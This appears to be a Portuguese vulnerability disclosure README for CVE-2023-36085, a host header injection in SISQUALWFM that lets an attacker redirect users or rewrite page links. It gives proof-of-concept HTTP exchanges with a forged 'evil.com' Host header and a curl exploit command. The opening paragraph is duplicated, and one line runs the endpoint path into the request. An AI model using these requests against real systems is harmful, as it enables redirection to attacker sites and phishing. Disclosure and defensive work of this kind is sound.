
Este repositório contém informações relacionadas à CVE-2023-36085, uma vulnerabilidade de injeção de cabeçalho de host descoberta no SISQUALWFM versão 7.1.319.103, que permite que um atacante manipule links de páginas da web ou redirecione usuários para um site malicioso. Esta vulnerabilidade foi atribuída à CVE-2023-36085 e foi corrigida na versão 7.1.319.111 e superior.
Este repositório contém informações relacionadas a uma vulnerabilidade de injeção de cabeçalho de host descoberta no SISQUALWFM versão 7.1.319.103, que permite a um atacante manipular links de páginas da web ou redirecionar usuários para um site malicioso. Esta vulnerabilidade recebeu o CVE-2023-36085 e foi corrigida na versão 7.1.319.111 e superiores.
Fornecemos um cenário de prova de conceito que demonstra a vulnerabilidade de injeção de cabeçalho de host, visando especificamente o endpoint . Esta vulnerabilidade permite que um atacante manipule links de páginas da web ou redirecione usuários para outro site ao adulterar o cabeçalho de host.
/sisqualIdentityServer/coreGET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Para explorar esta vulnerabilidade, um atacante pode utilizar o seguinte comando curl para modificar o cabeçalho de host:
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
Este repositório tem caráter exclusivamente informativo e não deve ser utilizado para atividades maliciosas. A vulnerabilidade foi divulgada de forma responsável ao fornecedor, e o problema já foi resolvido. É fundamental seguir as diretrizes de hacking ético e respeitar as práticas de divulgação responsável ao identificar e relatar vulnerabilidades.